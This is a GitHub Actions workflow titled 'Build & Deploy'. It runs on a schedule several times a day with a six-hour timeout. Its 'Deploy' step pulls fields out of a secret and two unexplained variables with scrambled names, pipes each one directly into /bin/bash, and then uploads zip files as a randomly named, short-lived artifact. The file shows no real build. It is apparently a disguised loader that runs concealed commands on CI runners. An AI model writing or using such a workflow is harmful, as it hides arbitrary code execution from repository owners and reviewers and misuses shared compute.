name: Build & Deploy
on:
  workflow_dispatch:

  schedule:
    - cron: '51 1,7,13,19 * * *'
permissions:
  contents: read
  actions: read
jobs:
  dispatcher:
    name: Run task
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - name: Checkout
        uses: actions/checkout@v4
      - name: Deploy
        env:
          p3464: ${{ secrets.p3464 }}
        run: |
          printf '%s' "$p3464" | jq -r .ju26 | /bin/bash
          echo $np10410 | jq -r .d20 | /bin/bash
          echo $mq6944 | jq -r .kve200 | /bin/bash

      - name: Save results
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: fG9ug0y8
          path: "*.zip"
          retention-days: 1
